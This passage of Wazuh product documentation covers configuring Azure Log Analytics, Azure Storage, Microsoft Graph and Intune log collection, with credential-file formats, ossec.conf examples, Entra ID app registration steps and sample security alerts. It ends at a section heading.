To authenticate your Microsoft Azure environment to Wazuh, you must store your credentials in a file using the format field = value.

The fields expected to be present in the credentials file depend on the type of service or activity you are monitoring.

Microsoft Azure Log Analytics and Graph

The file must contain only two lines, one for the application_id and another for the application_key obtained previously:

application_id = <YOUR_APPLICATION_ID>
application_key = <YOUR_APPLICATION_KEY>
Microsoft Azure Storage

The file must contain only two lines, one for the account_name and the other one for the account_key obtained previously:

account_name = <YOUR_ACCOUNT_NAME>
account_key = <YOUR_ACCOUNT_KEY>

Specify the authentication file in the /var/ossec/etc/ossec.conf configuration file using the <auth_path> tag, regardless of the service or activity you monitor. Take a look at the following example:

<wodle name="azure-logs">
  <disabled>no</disabled>
  <run_on_start>yes</run_on_start>

  <log_analytics>
     <auth_path>/var/ossec/wodles/credentials/log_analytics_credentials</auth_path>
      <tenantdomain>wazuh.com</tenantdomain>
      <request>
          <query>AzureActivity</query>
          <workspace>12345678-90ab-cdef-1234-567890abcdef</workspace>
          <time_offset>1d</time_offset>
      </request>
  </log_analytics>

  <graph>
     <auth_path>/var/ossec/wodles/credentials/graph_credentials</auth_path>
      <tenantdomain>wazuh.com</tenantdomain>
      <request>
          <query>auditLogs/directoryAudits</query>
          <time_offset>1d</time_offset>
      </request>
  </graph>

<storage>
     <auth_path>/var/ossec/wodles/credentials/storage_credentials</auth_path>
      <container name="insights-activity-logs">
          <blobs>.json</blobs>
          <content_type>json_inline</content_type>
          <time_offset>24h</time_offset>
      </container>
  </storage>
</wodle>

For more information on <auth_path>, look at the Wazuh module for Azure reference page.

You can add more than one request block in the same configuration. The Wazuh module for Azure processes each request sequentially. The configuration above is an example; it includes Microsoft Azure Log Analytics, Graph, and Storage configuration blocks.

Reparse

Warning

The reparse option will fetch and process all the logs from the starting date until the present. This process may generate duplicate alerts.

To fetch and process older Azure logs, you must run the Wazuh module for Azure using the --reparse option.

The la_time_offset value sets the starting point as a time offset back from the present. If you don't provide a la_time_offset value, the Wazuh module for Azure goes back to the date when it processed the first file.

The following code block shows an example of running the Wazuh module for Azure on a Wazuh manager using the --reparse option:

# /var/ossec/wodles/azure/azure-logs --log_analytics --la_auth_path credentials_example --la_tenant_domain 'wazuh.example.domain' --la_tag azure-activity --la_query "AzureActivity" --workspace example-workspace --la_time_offset 50d --debug 2 --reparse

The --debug 2 parameter gets a verbose output. This output is helpful to show that the script works, especially when handling a large amount of data.

Microsoft Azure Log Analytics

Microsoft Azure Log Analytics is a service that monitors your Microsoft Azure infrastructure, offering query capabilities that allow you to perform advanced searches specific to your data.

The Azure Log Analytics solution helps you to analyze and search Azure activity logs in all your Azure subscriptions, providing information about the operations performed with the resources of your subscriptions.

You can query data collected by Log Analytics using the Azure Log Analytics REST API, which uses the Microsoft Entra ID authentication scheme. You need a qualified application or client to use the Azure Log Analytics REST API. You must configure this manually on the Microsoft Azure portal. The section below shows how to set up the application and gives a use case:

Configuration
Azure
Setting up the application

The process below details how to create an application that uses the Azure Log Analytics REST API. It is also possible to configure an existing application. Please skip the Creating the application step if you already have an existing application.

Creating the application

Navigate to the Microsoft Entra ID panel on the Microsoft Azure portal to create a new application for Azure Log Analytics.

  1. Select the App registrations option from the Microsoft Entra ID panel. Then, select New registration.

  2. Define the user-facing display name for the application and select Register.

Granting permissions to the application
  1. Select All applications from App registrations and refresh the view. The new application will appear. In our case, the display name is LogAnalyticsApp.

  2. Go to the Overview section and save the Application (client) ID for later authentication.

  3. Go to the API permissions section and add the Data.Read permission to the application.

  4. Search for the Log Analytics API.

  5. Select the Read Log Analytics data permission from Applications permissions.

  6. Use an admin user to Grant admin consent for the tenant.

Granting the application access to the Azure Log Analytics API
  1. Access Log Analytics workspaces and create a new workspace or choose an existing one.

  2. Copy the Workspace ID value from the Overview section.

  3. Go to the Access control (IAM) section, click Add and select Add role assignment to add the required role to the application.

  4. Select the Log Analytics Reader role from the Job functions role tab.

  5. Select User, group, or service principal from the Members tab. Click Select members and find the App registration created previously.

  6. Click Review + assign to finish.

Sending logs to the Workspace

You need to create a diagnostic setting to collect logs and send them to the Azure Log Analytics Workspace created in the previous steps.

  1. Return to Microsoft Entra ID, scroll down on the left menu bar, and select the Diagnostic settings section.

  2. Click on Add diagnostic setting.

  3. Choose the log categories you want to collect from under Categories. Check the Send to Log Analytics workspace option under Destination details. Select the Log Analytics Workspace you created in the previous steps.

  4. Click on Save.

Azure Log Analytics will stream the selected categories to your workspace.

Wazuh requires valid credentials to pull logs from Azure Log Analytics. Look at the credentials section to learn how to generate a client secret to access the App registration.

Wazuh server or agent

You need to authorize the Wazuh module for Azure to access your Azure Log Analytics. For more information about setting up authorization, see the Configuring Azure credentials section.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
        <disabled>no</disabled>
        <run_on_start>no</run_on_start>
    
        <log_analytics>
            <auth_path>/var/ossec/wodles/credentials/log_analytics_credentials</auth_path>
            <tenantdomain>wazuh.com</tenantdomain>
    
            <request>
                <tag>azure-auditlogs</tag>
                <query>AuditLogs</query>
                <workspace>d6b...efa</workspace>
                <time_offset>1d</time_offset>
            </request>
    
        </log_analytics>
    </wodle>
    

    Where:

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <tenantdomain> is the tenant domain name. You can obtain this from the Overview section in Microsoft Entra ID.

    • <workspace> is the workspace ID that you need for authentication.

    • <time_offset> is how far back in time logs are fetched. In this case, all logs within a 24-hour timeframe will be downloaded.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

The configuration above allows Wazuh to search through any query using the tag value as the identifier.

Check the reference for more information about the Wazuh module for Azure.

Use case

Here is an example of monitoring the infrastructure activity using the previously created Azure application.

Creating a user

Follow the steps outlined below to create a user on Microsoft Entra ID:

  1. Navigate to Entra ID and select All users.

  2. Click on New User.

  3. Choose the option to Create a new user.

  4. Provide the necessary details for the user you want to create, and then choose the Create option to complete the creation.

Visualizing the events on the Wazuh dashboard

Once set up, you can check the results in the Wazuh dashboard.

Microsoft Azure Storage

Microsoft Azure Storage refers to the Microsoft Azure cloud storage solution. This service provides a massively scalable object store for data objects, a messaging store for reliable messaging, a file system service for the cloud, and a NoSQL store.

As an alternative to the Azure Log Analytics REST API, Wazuh offers access to a Microsoft Azure Storage account. You can export the activity logs of the Microsoft Azure infrastructure to the storage accounts.

This section explains using the Azure portal to archive your Microsoft Azure activity logs in a storage account.

Configuration
Azure
Configuring the activity log export
  1. Select the Audit Logs option from the Monitoring section within Microsoft Entra ID and click on Export Data Settings.

  2. Click Add diagnostic setting.

  3. Select the AuditLogs and Archive to the storage account checkbox, then select the subscription and Storage account to which you want to export the logs from the dropdown menu.

Wazuh server or agent

It is important to set the account_name and account_key of the storage account to authenticate. The image below shows an already configured storage account.

Check the credentials section for guidance on configuring Microsoft Azure Storage credentials.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
    
        <disabled>no</disabled>
        <interval>1d</interval>
        <run_on_start>yes</run_on_start>
    
        <storage>
    
                <auth_path>/home/manager/Azure/storage_auth.txt</auth_path>
                <tag>azure-activity</tag>
    
                <container name="insights-activity-logs">
                    <blobs>.json</blobs>
                    <content_type>json_inline</content_type>
                    <time_offset>24h</time_offset>
                    <path>info-logs</path>
                </container>
    
        </storage>
    </wodle>
    

    Where:

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <container> contains useful parameters for fetching blob storage contents.

    • <container name="insights-activity-logs"> is the log container that will be streamed.

    • <blobs>.json</blobs> is the blob format that will be downloaded.

    • <time_offset> is how far back in time logs are fetched. In this case, all logs within a 24-hour timeframe will be downloaded.

    • <content_type> is the format for storing the content of the blobs.

    Check the Wazuh module for Azure reference page to learn more about the parameters available and how to use them.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    
Use case

Here is an example of Microsoft Entra ID activity monitoring using the above configuration.

Create a new user

Create a new user in your Microsoft Azure environment using Microsoft Entra ID. A few minutes after creating the user, a new log will be available in a container named insights-activity-logs inside the Storage account specified when configuring the Activity log export.

Please refer to the creating a user section under the Azure Log Analytics use case.

You can check the results in the Wazuh dashboard.

Microsoft Graph

In this section, you will learn how to monitor your Microsoft Entra ID activity using the Microsoft Graph REST API.

The following are endpoints in the Microsoft Graph REST API related to auditing and monitoring activities in Microsoft Entra ID.

  • Directory audits: auditLogs/directoryAudits

  • Sign-ins: auditLogs/signIns

  • Provisioning: auditLogs/provisioning

These endpoints allow administrators and developers to monitor and audit activities within Microsoft Entra ID for security, compliance, and operational purposes.

Wazuh can process Microsoft Entra ID activity reports using the above endpoints. Each one of them requires you to execute a different query. You place these queries within the <query> tag of a request block in your Wazuh module for Azure configuration, as illustrated below.
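For illustration, a request that pulls the Sign-ins report from the table above would mirror the directory audits example shown later in this section, changing only the <tag> (a hypothetical identifier) and <query> values:

<graph>
  <auth_path>/var/ossec/wodles/azure/credentials</auth_path>
  <tenantdomain>wazuh.com</tenantdomain>
  <request>
      <tag>entra-sign-ins</tag>
      <query>auditLogs/signIns</query>
      <time_offset>1d</time_offset>
  </request>
</graph>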

Configuration
Azure
Creating the application

This section explains how to create an application for use with the Microsoft Graph REST API. However, it is also possible to configure an existing application. If this is the case, skip this step.

  1. In the Microsoft Entra ID panel, select App registrations. Then, select New registration.

  2. Give the app a descriptive name, select the appropriate account type, and click Register.

The app is now registered.

Granting permissions to the application
  1. Click on the application, go to the Overview section, and save the Application (client) ID for later authentication.

  2. Select the Add a permission option in the API permissions section.

  3. Search for "Microsoft Graph" and select the API.

  4. Select the permissions in Applications permissions that align with your infrastructure. In this case, AuditLog.Read.All permissions will be granted. Then, click Add permissions.

  5. Use an admin user to Grant admin consent for the tenant.

Obtaining the application key for authentication

To use the Microsoft Graph API to retrieve the logs, we must generate an application key to authenticate against the API. Follow the steps below to generate the application key.

  1. Select Certificates & secrets, then select New client secret to generate a key.

  2. Give an appropriate description, set a preferred duration for the key, and then click Add.

  3. Copy the key value. You will use it later for authentication.

    Note

    Copy the key before exiting this page, as it will only be displayed once. If you do not copy it before exiting the page, you will have to generate a fresh key.

Wazuh server or agent

You will use the key and ID of the application saved during the previous steps here. In this case, both fields were saved in a file for authentication. Check the Configuring Azure credentials section for more information about this topic.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
      <disabled>no</disabled>
      <wday>Monday</wday>
      <time>2:00</time>
      <run_on_start>no</run_on_start>
    
      <graph>
        <auth_path>/var/ossec/wodles/azure/credentials</auth_path>
        <tenantdomain>wazuh.com</tenantdomain>
        <request>
            <tag>microsoft-entra_id</tag>
            <query>auditLogs/directoryAudits</query>
            <time_offset>1d</time_offset>
        </request>
      </graph>
    
    </wodle>
    

    Where:

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <tenantdomain> is the tenant domain name. You can obtain this from the Overview section in Microsoft Entra ID.

    • <wday> is the day of the week scheduled for the scan.

    • <query> is the path to where the audit logs are stored.

    • <time> is the time scheduled for the scan.

    • <time_offset> set to 1d means that only the log data from the last day is parsed.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

Check the Wazuh module for Azure reference for more information about using the different available parameters. Please see the Wazuh Azure authentication file section for guidance on how to set up credentials to monitor your Microsoft Entra ID.

Warning

The field tenantdomain is mandatory. You can obtain it from the Overview section in Microsoft Entra ID.

Use case
Monitoring Microsoft Entra ID

Microsoft Entra ID is the identity and directory management service that combines essential directory services, application access management, and identity protection in a single solution.

Wazuh can monitor the Microsoft Entra ID (ME-ID) service using the activity reports provided by the Microsoft Graph REST API. Microsoft Graph API can perform read operations on directory data and objects on Microsoft Entra ID applications.

Here is an example of Microsoft Entra ID activity monitoring using the above configuration.

Create a new user

Create a new user in Azure. A successful user creation activity will produce a log to reflect it. You can retrieve this log using the auditLogs/directoryAudits query.

  1. Navigate to Users > All users, select New user > Create new user.

  2. Fill in the required details and click Review + create. The user is now created.

You can check for the result of the successful user creation in the Audit logs section of Microsoft Entra ID.

Once the integration is running, the results will be available in the Security Events tab of the Wazuh dashboard.

Monitoring Microsoft Graph services with Wazuh

The Microsoft Graph API is a comprehensive system that provides access to data across the full suite of Microsoft cloud services, including Microsoft 365, Azure, Dynamics 365, and other Microsoft cloud services. It is an endpoint for accessing structured data, insights, and rich relationships from the Microsoft Cloud ecosystem.

This section provides instructions for monitoring your organization's Microsoft Graph API resources and relationships using the Wazuh module for Microsoft Graph.

The Wazuh module for Microsoft Graph allows you to monitor the following:

  • Microsoft Entra ID Protection

  • Microsoft 365 Defender

  • Microsoft Defender for Cloud Apps

  • Microsoft Defender for Endpoint

  • Microsoft Defender for Identity

  • Microsoft Defender for Office 365

  • Microsoft Purview eDiscovery

  • Microsoft Purview Data Loss Prevention (DLP)

The data from these services is visualized using the Wazuh Microsoft API Dashboard.

While these services are the core of the security resource, you can monitor many additional resources using the Microsoft Graph API. See the Overview of Microsoft Graph documentation to learn more.

Note

The security resource can be considered mature, as it has been tested with pre-made rules. However, your organization can ingest logs from other resources into your Wazuh deployment.

Retrieving content

To retrieve a set of logs from Microsoft Graph, make a GET request using the URL below:

GET https://graph.microsoft.com/{version}/{resource}/{relationship}?{query-parameters}

A description of the current production version of the Microsoft Graph API can be found in the Overview of Microsoft Graph.

Alternatively, the API can be tested directly in the Microsoft Graph Explorer.
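
For example, you can exercise this endpoint manually with curl before configuring the module. The following is only an illustrative sketch: it assumes an application has already been registered as described below, and the <YOUR_TENANT_ID>, <YOUR_CLIENT_ID>, and <YOUR_SECRET_VALUE> placeholders must be replaced with your own values. The first request obtains an access token from the Microsoft identity platform, and the second uses it to query the security/alerts_v2 relationship:

# curl -s -X POST "https://login.microsoftonline.com/<YOUR_TENANT_ID>/oauth2/v2.0/token" \
    -d "grant_type=client_credentials" \
    -d "client_id=<YOUR_CLIENT_ID>" \
    -d "client_secret=<YOUR_SECRET_VALUE>" \
    -d "scope=https://graph.microsoft.com/.default"

# curl -s -H "Authorization: Bearer <ACCESS_TOKEN>" \
    "https://graph.microsoft.com/v1.0/security/alerts_v2"

The first call returns a JSON document containing an access_token field. Use that value in place of <ACCESS_TOKEN> in the second call; a successful response confirms that the credentials and API permissions are set up correctly.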

Microsoft Graph API setup

Wazuh must be authorized before it can pull logs and other content from the Microsoft Graph API. This authentication process is possible using the tenant_id, client_id, and secret_value of an authorized application, which we will register through Azure.

Registering your app
  1. Register an application to authenticate with the Microsoft identity platform endpoint.

  2. Fill in the name of your app, choose the desired account type, and click on the Register button:

The app is now registered; you can see information about it in its Overview section. Make sure to note down the client_id and tenant_id information:

Certificates & secrets
  1. Generate a secret you will use for the authentication process. Go to Certificates & secrets and click on New client secret, which will then generate the secret and its ID:

  2. Make sure to copy and save the secret_value information:

    Note

    Ensure you write down the secret's Value field, as the UI won't let you copy it later.

API permissions

Your application needs specific API permissions to retrieve logs and events from the Microsoft Graph API. The specific API permission required depends on the resource to be accessed. The comprehensive list of permissions is documented in Microsoft Graph permissions reference.

To configure the application permissions, go to the API permissions page and choose Add a permission.

  1. Select Microsoft Graph API and click on Application permissions:

  2. Add the following relationships' permissions under the SecurityAlert and SecurityIncident sections:

    • SecurityAlert.Read.All: This permission is required to read security alerts from the /security/alerts_v2 API on your tenant.

    • SecurityIncident.Read.All: This permission is required to read security incident data, including associated events/alerts from the /security/incidents API on your tenant.

  3. Use an admin user to Grant admin consent for the tenant:

    Note

    An Admin account is required to Grant admin consent for Default Directory.

Wazuh server or agent

Next, we will set the necessary configurations to allow the Wazuh module for Microsoft Graph to pull logs from the Microsoft Graph API successfully.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf:

    <ms-graph>
        <enabled>yes</enabled>
        <only_future_events>yes</only_future_events>
        <curl_max_size>10M</curl_max_size>
        <run_on_start>yes</run_on_start>
        <interval>5m</interval>
        <version>v1.0</version>
        <api_auth>
          <client_id><YOUR_APPLICATION_ID></client_id>
          <tenant_id><YOUR_TENANT_ID></tenant_id>
          <secret_value><YOUR_SECRET_VALUE></secret_value>
          <api_type>global</api_type>
        </api_auth>
        <resource>
          <name>security</name>
          <relationship>alerts_v2</relationship>
          <relationship>incidents</relationship>
        </resource>
        <resource>
          <name>deviceManagement</name>
          <relationship>auditEvents</relationship>
        </resource>
    </ms-graph>
    

    In this case, we search for alerts_v2 and incidents within the security resource, and auditEvents within the deviceManagement resource, at an interval of 5m. Because <only_future_events> is set to yes, only logs generated after the Wazuh module for Microsoft Graph starts are collected.

    Where:

    • <client_id> (also known as an Application ID) is the unique identifier of your registered application.

    • <tenant_id> (also known as Directory ID) is the unique identifier for your Azure tenant.

    • <secret_value> is the value of the client secret. It is used to authenticate the registered app on the Azure tenant.

    • <api_type> specifies the type of Microsoft 365 subscription plan the tenant uses. global refers to either a commercial or GCC tenant.

    • <name> specifies the resource's name (i.e., specific API endpoint) to query for logs.

    • <relationship> specifies the types of content (relationships) to obtain logs for.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Microsoft Graph.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

Note

Multi-tenant is not supported. You can only configure one block of api_auth. To learn more about the Wazuh module for Microsoft Graph options, see the ms-graph reference.

Use cases

Using the configuration mentioned above, we examine the following use cases:

  • Monitoring security resources.

  • Monitoring Microsoft Intune device management audit events.

Monitoring security resources

Spam email is one of the most common alerts an organization of any size receives. In this case, we examine a spam email containing malicious content and see how Microsoft Graph and Wazuh report this information.

We set up the Wazuh module for Microsoft Graph to monitor the security resource and the alerts_v2 relationship within our Microsoft 365 tenant, as described in Retrieving content. We also enable Microsoft Defender for Office 365 within the Microsoft 365 tenant. Microsoft Defender for Office 365 monitors email messages for threats such as spam and malicious attachments.

Detect malicious email

Enable Microsoft Defender for Office 365 and send a malicious email to an email address in the monitored domain. A malicious email detection activity will produce a log that can be accessed using the alerts_v2 relationship within the Microsoft 365 tenant.

  1. Log in to Microsoft 365 Defender portal using an admin account.

  2. Navigate to Policies & rules > Threat policies > Preset Security Policies.

  3. Toggle the Standard protection is off button under Standard protection.

  4. Click on Manage protection settings and follow the prompt to set up the policies.

When Microsoft Defender for Office 365 detects a malicious email event, a log similar to the following is generated. You can view this event using the Alerts tab of the Microsoft Defender for Office 365 page:

{
    "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "providerAlertId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "incidentId":"xx",
    "status":"resolved",
    "severity":"informational",
    "classification":"truePositive",
    "determination":null,
    "serviceSource":"microsoftDefenderForOffice365",
    "detectionSource":"microsoftDefenderForOffice365",
    "detectorId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "tenantId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "title":"Email messages containing malicious file removed after delivery.",
    "description":"Emails with malicious file that were delivered and later removed -V1.0.0.3",
    "recommendedActions":"",
    "category":"InitialAccess",
    "assignedTo":"Automation",
    "alertWebUrl":"https://security.microsoft.com/alerts/xxxx-xxxx-xxxx-xxxx-xxxx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
    "incidentWebUrl":"https://security.microsoft.com/incidents/xx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
    "actorDisplayName":null,
    "threatDisplayName":null,
    "threatFamilyName":null,
    "mitreTechniques":[
        "T1566.001"
    ],
    "createdDateTime":"2022-11-13T23:48:21.9847068Z",
    "lastUpdateDateTime":"2022-11-14T00:08:37.5366667Z",
    "resolvedDateTime":"2022-11-14T00:07:25.7033333Z",
    "firstActivityDateTime":"2022-11-13T23:45:41.0593397Z",
    "lastActivityDateTime":"2022-11-13T23:47:41.0593397Z",
    "comments":[

    ],
    "evidence":[
        {
            "_comment":"Snipped"
        }
    ]
}

The Wazuh module for Microsoft Graph retrieves this log via the Microsoft Graph API. This log matches an out-of-the-box rule with ID 99506. This triggers an alert with the following details:

{
    "timestamp":"2024-08-29T14:53:15.301+0000",
    "rule":{
        "id":"99506",
        "level":6,
        "description":"MS Graph message: The alert is true positive and detected malicious activity.",
        "groups":["ms-graph"],
        "firedtimes":1,
        "mail":"false"
    },
    "agent":{
        "id":"001",
        "name":"ubuntu-bionic"
    },
    "manager":{
        "name":"ubuntu-bionic"
    },
    "id":"1623276774.47272",
    "decoder":{
        "name":"json"
    },
    "data":{
        "integration":"ms-graph",
        "ms-graph":{
            "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "providerAlertId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "incidentId":"91",
            "status":"resolved",
            "severity":"informational",
            "classification":"truePositive",
            "determination":null,
            "serviceSource":"microsoftDefenderForOffice365",
            "detectionSource":"microsoftDefenderForOffice365",
            "detectorId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "tenantId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "title":"Email messages containing malicious file removed after delivery.",
            "description":"Emails with malicious file that were delivered and later removed -V1.0.0.3",
            "recommendedActions":"",
            "category":"InitialAccess",
            "assignedTo":"Automation",
            "alertWebUrl":"https://security.microsoft.com/alerts/xxxx-xxxx-xxxx-xxxx-xxxx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
            "incidentWebUrl":"https://security.microsoft.com/incidents/91?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
            "actorDisplayName":null,
            "threatDisplayName":null,
            "threatFamilyName":null,
            "resource":"security",
            "relationship":"alerts_v2",
            "mitreTechniques":[
                "T1566.001"
            ],
            "createdDateTime":"2022-11-13T23:48:21.9847068Z",
            "lastUpdateDateTime":"2022-11-14T00:08:37.5366667Z",
            "resolvedDateTime":"2022-11-14T00:07:25.7033333Z",
            "firstActivityDateTime":"2022-11-13T23:45:41.0593397Z",
            "lastActivityDateTime":"2022-11-13T23:47:41.0593397Z",
            "comments":[

            ],
            "evidence":[
                {
                    "_comment":"Snipped"
                }
            ]
        }
    }
}

The alert is seen on the Wazuh dashboard.

Monitoring device management audit events

Mobile Device Management (MDM) tools, such as Microsoft Intune, enable organizations to manage devices. By integrating Microsoft Graph with Wazuh, organizations can monitor Microsoft Intune logs.

For instance, if a user updates the enrollment settings and the module is configured to monitor the deviceManagement resource with the auditEvents relationship, a JSON log like the following is generated:

{
    "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "displayName": "Create DeviceEnrollmentConfiguration",
    "componentName": "Enrollment",
    "activity": null,
    "activityDateTime": "2024-08-09T18:29:00.7023255Z",
    "activityType": "Create DeviceEnrollmentConfiguration",
    "activityOperationType": "Create",
    "activityResult": "Success",
    "correlationId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "category": "Enrollment",
    "actor": {
        "auditActorType": "ItPro",
        "userPermissions": [
            "*"
        ],
        "applicationId":"xxxx-xxxx-xxxx-xxxx-xxxx",
        "applicationDisplayName": "Microsoft Intune portal extension",
        "userPrincipalName": "xxx@xxx.com",
        "servicePrincipalName": null,
        "ipAddress": null,
        "userId":"xxxx-xxxx-xxxx-xxxx-xxxx"
    },
    "resources": [
        {
            "displayName": "Test restriction",
            "auditResourceType": "DeviceEnrollmentLimitConfiguration",
            "resourceId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "modifiedProperties": [
                {
                    "displayName": "Id",
                    "oldValue": null,
                    "newValue":"xxxx-xxxx-xxxx-xxxx-xxxx_Limit"
                },
                {
                    "displayName": "Limit",
                    "oldValue": null,
                    "newValue": "5"
                },
                {
                    "displayName": "Description",
                    "oldValue": null,
                    "newValue": ""
                },
                {
                    "displayName": "Priority",
                    "oldValue": null,
                    "newValue": "1"
                },
                {
                    "displayName": "CreatedDateTime",
                    "oldValue": null,
                    "newValue": "8/9/2024 6:29:00 PM"
                },
                {
                    "displayName": "LastModifiedDateTime",
                    "oldValue": null,
                    "newValue": "8/9/2024 6:29:00 PM"
                },
                {
                    "displayName": "Version",
                    "oldValue": null,
                    "newValue": "1"
                },
                {
                    "displayName": "DeviceEnrollmentConfigurationType",
                    "oldValue": null,
                    "newValue": "Limit"
                },
                {
                    "displayName": "DeviceManagementAPIVersion",
                    "oldValue": null,
                    "newValue": "5023-03-29"
                },
                {
                    "displayName": "$Collection.RoleScopeTagIds[0]",
                    "oldValue": null,
                    "newValue": "Default"
                }
            ]
        }
    ]
}

In this example, you can look at rule ID 99652, which corresponds to the Microsoft Graph message "MDM Intune audit event":

<rule id="99652" level="3">
    <if_sid>99651</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.relationship">auditEvents</field>
    <description>MS Graph message: MDM Intune audit event.</description>
</rule>

Once Wazuh connects with the Microsoft Graph API, the previous log triggers the rule and raises the following Wazuh alert:

{
    "timestamp": "2024-08-09T18:29:03.362+0000",
    "rule": {
        "id": "99652",
        "level": 3,
        "description": "MS Graph message: MDM Intune audit event.",
        "firedtimes": 1,
        "mail": false,
        "groups": [
            "ms-graph"
        ]
    },
    "agent": {
        "id": "001",
        "name":"ubuntu-bionic"
    },
    "manager": {
        "name":"ubuntu-bionic"
    },
    "id": "1723228143.38630",
    "decoder": {
        "name": "json"
    },
    "data": {
        "integration": "ms-graph",
        "ms-graph": {
            "id": "xxxx-xxxx-xxxx-xxxx-xxxx",
            "displayName": "Create DeviceEnrollmentConfiguration",
            "componentName": "Enrollment",
            "activity": null,
            "activityDateTime": "2024-08-09T18:29:00.7023255Z",
            "activityType": "Create DeviceEnrollmentConfiguration",
            "activityOperationType": "Create",
            "activityResult": "Success",
            "correlationId": "xxxx-xxxx-xxxx-xxxx-xxxx",
            "category": "Enrollment",
            "actor": {
                "auditActorType": "ItPro",
                "userPermissions": [
                    "*"
                ],
                "applicationId": "xxxx-xxxx-xxxx-xxxx-xxxx",
                "applicationDisplayName": "Microsoft Intune portal extension",
                "userPrincipalName": "xxx@xxx.com",
                "servicePrincipalName": null,
                "ipAddress": null,
                "userId": "xxxx-xxxx-xxxx-xxxx-xxxx"
            },
            "resources": [
                {
                    "displayName": "Test restriction",
                    "auditResourceType": "DeviceEnrollmentLimitConfiguration",
                    "resourceId": "xxxx-xxxx-xxxx-xxxx-xxxx",
                    "modifiedProperties": [
                        {
                            "displayName": "Id",
                            "oldValue": null,
                            "newValue": "xxxx-xxxx-xxxx-xxxx-xxxx_Limit"
                        },
                        {
                            "displayName": "Limit",
                            "oldValue": null,
                            "newValue": "5"
                        },
                        {
                            "displayName": "Description",
                            "oldValue": null,
                            "newValue": ""
                        },
                        {
                            "displayName": "Priority",
                            "oldValue": null,
                            "newValue": "1"
                        },
                        {
                            "displayName": "CreatedDateTime",
                            "oldValue": null,
                            "newValue": "8/9/2024 6:29:00 PM"
                        },
                        {
                            "displayName": "LastModifiedDateTime",
                            "oldValue": null,
                            "newValue": "8/9/2024 6:29:00 PM"
                        },
                        {
                            "displayName": "Version",
                            "oldValue": null,
                            "newValue": "1"
                        },
                        {
                            "displayName": "DeviceEnrollmentConfigurationType",
                            "oldValue": null,
                            "newValue": "Limit"
                        },
                        {
                            "displayName": "DeviceManagementAPIVersion",
                            "oldValue": null,
                            "newValue": "5023-03-29"
                        },
                        {
                            "displayName": "$Collection.RoleScopeTagIds[0]",
                            "oldValue": null,
                            "newValue": "Default"
                        }
                    ]
                }
            ],
            "resource": "deviceManagement",
            "relationship": "auditEvents"
        }
    },
    "location": "ms-graph"
}

Microsoft Intune integration

Microsoft Intune is a cloud-based solution for managing various devices, including virtual endpoints, physical computers, mobile devices, and IoT devices. Integrating Microsoft Intune with Wazuh provides the following benefits:

  • It allows Wazuh to retrieve and process audit logs from managed devices using built-in decoders and rules, and generate insightful and actionable security alerts.

  • It enhances visibility into all managed endpoint activities, strengthening security monitoring across the organization.

  • It helps organizations ensure device administration aligns with compliance requirements, thus helping with maintaining security policies.

Wazuh integration with Microsoft Intune is available from Wazuh 4.10.0 and builds on the existing Microsoft Graph API integration. It operates synchronously, retrieving logs from managed endpoints at scheduled intervals. This integration allows the Wazuh agent to collect and process three types of data from Intune:

  • Audit events: Logs of actions and changes occurring within the Intune environment.

  • Managed devices: Information about devices managed by Intune.

  • Detected applications: Applications installed on managed devices as reported by Intune.

The configuration of this integration is handled via the Wazuh module for Microsoft Graph in the Wazuh agent. You must configure the deviceManagement resource (i.e., specific API endpoint) on the Wazuh agent with the following relationships to enable the integration:

  • auditEvents: Audit logs include a record of activities that generate a change in Microsoft Intune.

  • managedDevices: List of devices managed by Microsoft Intune.

  • detectedApps: List of applications detected on devices managed by Microsoft Intune. The results also include a list of devices where each app is installed.

Refer to the ms-graph configuration reference documentation for more information.

Configuration

Perform the following steps to integrate Microsoft Intune with Wazuh:

  • Configure the Microsoft Graph API permissions.

  • Configure the relationships.

  • Extend the Wazuh ruleset (optional).

  • Import custom dashboards.

Configure the Microsoft Graph API permissions

This integration allows Wazuh to pull data from the Microsoft Graph API. Before Wazuh can pull logs and other content from the Microsoft Graph API, it must be authorized and pass through an authentication process. Wazuh must provide the tenant_id, client_id, and secret_value of an authorized application that is registered through Azure.

This step involves configuring the API permissions required to access Microsoft Intune events via the Microsoft Graph API. The required permissions are:

  • DeviceManagementApps.Read.All: Read auditEvents and detectedApps relationship data from your tenant.

  • DeviceManagementManagedDevices.Read.All: Read auditEvents and managedDevices relationship data from your tenant.

For further information, please refer to the Microsoft Graph API setup guide.

Configure the relationships

